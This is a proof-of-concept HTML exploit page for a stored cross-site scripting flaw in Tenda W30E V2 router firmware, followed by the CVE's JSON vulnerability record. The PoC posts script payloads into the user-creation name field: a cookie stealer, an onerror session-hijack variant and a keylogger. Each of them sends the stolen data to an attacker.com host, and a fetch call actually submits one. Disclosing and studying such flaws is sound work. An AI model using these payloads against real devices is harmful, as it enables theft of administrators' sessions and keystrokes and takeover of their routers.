CVE-2026-24433

<!-- CVE-2026-24433 PoC: Stored XSS in Tenda W30E V2 User Creation --> <!-- This PoC demonstrates the stored XSS vulnerability via user creation --> <!DOCTYPE html> <html> <head> <title>CVE-2026-24433 PoC</title> </head> <body> <h2>CVE-2026-24433 - Tenda W30E V2 Stored XSS</h2> <form id="exploitForm" action="http://<target_ip>/goform/createUser" method="POST"> <!-- Target router IP --> <input type="hidden" name="target_ip" value="http://192.168.0.1"> <!-- Malicious payload: Cookie stealer --> <input type="hidden" name="user_name" value='<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'> <!-- Alternative payload: Session hijacking --> <input type="hidden" name="user_name" value='<img src=x onerror="fetch(\'https://attacker.com/log?cookie=\'+btoa(document.cookie))">'> <!-- Alternative payload: Keylogger --> <input type="hidden" name="user_name" value='<script>document.onkeypress=function(e){fetch("https://attacker.com/klog?k="+e.key)}</script>'> <button type="submit">Launch Exploit</button> </form> <script> // Auto-submit form for demonstration // document.getElementById('exploitForm').submit(); // Example: Using fetch API to send the malicious request const payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)<\/script>'; fetch('/goform/createUser', { method: 'POST', headers: { 'Content-Type': 'application/x-www-form-urlencoded', }, body: 'user_name=' + encodeURIComponent(payload) + '&password=test123&privilege=1' }) .then(response => response.text()) .then(data => console.log('Payload sent:', data)) .catch(error => console.error('Error:', error)); </script> </body> </html>

{"cve": {"id": "CVE-2026-24433", "sourceIdentifier": "[email protected]", "published": "2026-01-26T18:16:40.873", "lastModified": "2026-01-28T20:10:23.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) contain a stored cross-site scripting vulnerability in the user creation functionality. Insufficient input validation allows attacker-controlled script content to be stored and later executed when administrative users access the affected management pages."}, {"lang": "es", "value": "Las versiones de firmware Shenzhen Tenda W30E V2 hasta e incluyendo V16.01.0.19(5037) contienen una vulnerabilidad de cross-site scripting almacenado en la funcionalidad de creación de usuarios. La validación de entrada insuficiente permite que el contenido de script controlado por el atacante sea almacenado y posteriormente ejecutado cuando los usuarios administrativos acceden a las páginas de gestión afectadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:tenda:w30e_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "16.01.0.19\\(5037\\)", "matchCriteriaId": "4DB07B19-71FC-4936-98BD-36A8B3B7CBF0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:tenda:w30e:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "56B9C2BB-D36E-40F8-83FF-FC919337F6BD"}]}]}], "references": [{"url": "https://www.tendacn.com/product/W30E", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/tenda-w30e-v2-stored-xss-via-user-name-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}